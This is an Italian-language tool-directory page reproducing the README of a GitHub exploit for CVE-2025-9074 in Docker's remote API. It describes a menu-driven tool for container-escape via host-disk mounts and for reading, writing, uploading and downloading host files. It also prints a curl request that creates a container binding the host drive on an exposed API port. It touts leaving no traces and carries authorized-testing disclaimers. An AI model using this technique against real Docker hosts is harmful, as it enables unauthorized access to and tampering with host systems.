Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-9074-Docker-Exploit — Un potente strumento di exploit per l'API remota di Docker, utilizzato per la ricerca e il test di sicurezza della vulnerabilità CVE-2025-9074. | Kitploit
Strumenti/GitHubGitHub/shaoshi17/cve-2025-9074-docker-exploit
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitPenetration TestingSicurezza CloudRed TeamingEscape dal Container
GitHubshaoshi17/cve-2025-9074-docker-exploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-9074-Docker-Exploit

Un potente strumento di exploit per l'API remota di Docker, utilizzato per la ricerca e il test di sicurezza della vulnerabilità CVE-2025-9074.

Vedi Repository
127 mesi faNon ancora revisionato

CVE-2025-9074 Strumento di esecuzione comandi in container Docker

Un potente strumento di exploit per l'API remota di Docker, utilizzato per la ricerca e il test di sicurezza della vulnerabilità CVE-2025-9074.

Vantaggi principali

✅ Gestione del ciclo di vita del container completamente automatica: crea automaticamente container temporanei, li pulisce automaticamente dopo le operazioni, senza lasciare tracce
✅ Gestione intelligente dei percorsi: riconosce e converte automaticamente i percorsi Windows nel formato di mount Docker
✅ Flusso di lavoro completamente automatizzato: non è necessario inserire manualmente comandi complessi, interazione a menu, operazioni sui file con un solo clic
✅ Compatibilità multipiattaforma: supporto perfetto per sistemi Windows e Linux

Screenshot di alcune funzionalità

image

Caratteristiche

  • Operazioni sui container

    • Visualizza container in esecuzione
    • Visualizza tutti i container (inclusi quelli fermati)
    • Crea nuovo container
    • Ferma container
    • Elimina container
    • Esecuzione di comando singolo
    • Terminale interattivo (richiede la libreria docker)
  • Gestione immagini

    • Visualizza immagini locali
    • Scarica nuova immagine
    • Elimina immagine
  • Operazioni sui file dell'host

    • Carica file sull'host
    • Scarica file dall'host
    • Leggi contenuto file dell'host
    • Scrivi file sull'host
    • Gestione automatica del mapping dei percorsi Windows Docker Desktop

Descrizione della vulnerabilità

CVE-2025-9074 è una vulnerabilità di sicurezza nell'API remota di Docker. Un attaccante può, tramite accesso non autorizzato all'API Docker:

  • Eseguire comandi arbitrari
  • Creare container e montare il disco dell'host
  • Effettuare l'escape dal container
  • Leggere/scrivere file sull'host

Requisiti di sistema

  • Python 3.6+

Installazione delle dipendenze

Installa tutte le dipendenze usando requirements.txt:

root@kitploit:~
pip install -r requirements.txt

Oppure installa manualmente:

root@kitploit:~
pip install requests docker websocket-client

Utilizzo

Utilizzo base

Esegui direttamente lo script usando l'indirizzo API Docker predefinito:

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

Indirizzo API Docker personalizzato

root@kitploit:~
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375

Argomenti della riga di comando

root@kitploit:~
python CVE-2025-9074-docker-exploit.py [选项]

选项:
  -u, --url URL         Docker API 地址(默认: http://192.168.65.7:2375)

Dettaglio delle funzionalità

Operazioni sui container

  1. Visualizza container in esecuzione: mostra l'elenco di tutti i container in esecuzione
  2. Visualizza tutti i container: mostra tutti i container (inclusi quelli fermati)
  3. Crea nuovo container: crea un nuovo container usando l'immagine specificata
  4. Ferma container: ferma un container in esecuzione
  5. Elimina container: elimina un container (eliminazione forzata possibile)
  6. Esecuzione comando singolo: esegue un singolo comando nel container
  7. Terminale interattivo: entra nella shell interattiva del container (richiede la libreria docker)

Utilizzo del terminale interattivo

  1. Dopo aver avviato lo script, seleziona "1. Operazioni sui container"
  2. Seleziona "1. Visualizza container in esecuzione"
  3. Inserisci il numero del container per selezionarlo
  4. Seleziona "2. Terminale interattivo (richiede la libreria docker)"
  5. Inserisci il comando shell (predefinito: /bin/sh)
  6. Inizia l'operazione interattiva

Gestione immagini

  1. Visualizza immagini: elenca tutte le immagini locali
  2. Scarica immagine: scarica una nuova immagine da Docker Hub
  3. Elimina immagine: elimina un'immagine locale

Operazioni sui file dell'host

Carica file sull'host

root@kitploit:~
1. 上传文件到宿主机
请输入本地文件路径: /path/to/local/file.txt
请输入宿主机目标目录: D:/temp
请输入目标文件名 (留空则使用原文件名): 

Scarica file dall'host

root@kitploit:~
2. 从宿主机下载文件
请输入宿主机文件路径: D:/temp/file.txt
请输入本地保存路径: /tmp

Leggi contenuto file dell'host

root@kitploit:~
3. 读取宿主机文件内容
请输入宿主机文件路径: D:/temp/file.txt

Scrivi file sull'host

root@kitploit:~
4. 向宿主机写入文件
请输入宿主机目标目录: D:/temp
请输入文件内容: Hello, World!

Mapping dei percorsi Windows Docker Desktop

Questo strumento gestisce automaticamente il mapping dei percorsi di Windows Docker Desktop:

Percorso Windows

Formati di input supportati:

  • D:\ o D:/
  • D:\temp o D:/temp
  • "D:\file.txt" (con virgolette)
  • 'D:/file.txt' (con virgolette)

Avvertenze di sicurezza

⚠️ Importante:

  1. Solo per test autorizzati: questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi
  2. Conformità legale: assicurati di aver ottenuto l'autorizzazione esplicita dal sistema di destinazione prima dell'uso
  3. Ambiente isolato: si consiglia l'uso in un ambiente di test isolato
  4. Limitazioni dei permessi: Windows Docker Desktop deve essere eseguito come amministratore per scrivere sul disco C
  5. Non abusare: l'uso non autorizzato di questo strumento potrebbe violare leggi e regolamenti

Principio tecnico

Escape dal container

Creazione di un container tramite API Docker e montaggio del disco dell'host:

root@kitploit:~
curl -X POST "http://<target>:2375/containers/create" \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "python:3.11.7",
    "Cmd": ["sleep", "999d"],
    "HostConfig": {
      "Binds": ["/mnt/host/d:/tmp"]
    },
    "Tty": true
  }'

Lettura e scrittura di file

Legge e scrive file dell'host eseguendo comandi nel container:

root@kitploit:~
# 写入文件
echo "content" > /tmp/file.txt

# 读取文件
cat /tmp/file.txt

Risoluzione dei problemi

Creazione container fallita (errore 500)

  • Verifica che l'API Docker sia accessibile
  • Conferma che il formato del percorso sia corretto
  • Verifica che l'immagine esista

Scrittura file fallita

  • Windows Docker Desktop deve essere eseguito come amministratore
  • Controlla le impostazioni dei permessi della directory di destinazione

Impossibile avviare il terminale interattivo

  • Assicurati di aver installato la libreria docker: pip install docker websocket-client
  • Verifica che il terminale supporti la modalità interattiva

Sviluppo e test

Esecuzione dei test

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

Struttura del codice

root@kitploit:~
CVE-2025-9074-docker-exploit.py
├── 容器管理函数
│   ├── get_containers()
│   ├── display_containers()
│   ├── create_container()
│   ├── stop_container()
│   └── delete_container()
├── 镜像管理函数
│   ├── get_images()
│   ├── display_images()
│   ├── pull_image()
│   └── remove_image()
├── 宿主机文件操作函数
│   ├── upload_file_to_host()
│   ├── download_file_from_host()
│   ├── read_file_from_host()
│   └── write_file_to_host()
└── 工具函数
    ├── normalize_host_path()
    ├── create_container_with_mount()
    ├── start_container()
    └── stop_and_remove_container()

Contributi

Benvenuti contributi tramite Issue e Pull Request!

Licenza

Questo progetto è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza.

Dichiarazione di esclusione di responsabilità

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi. L'utente si assume ogni responsabilità e rischio derivante dall'uso di questo strumento. L'autore non è responsabile per qualsiasi uso improprio o non autorizzato dello strumento.

Riferimenti

  • Dettagli della vulnerabilità CVE-2025-9074
  • Documentazione API remota Docker
  • Regole di mapping dei percorsi Windows Docker Desktop
Scarica lo strumento
Percorso mount Docker
D:\/mnt/host/d
D:\temp/mnt/host/d/temp
C:\Windows/mnt/host/c/Windows
C:\Users\test/mnt/host/c/Users/test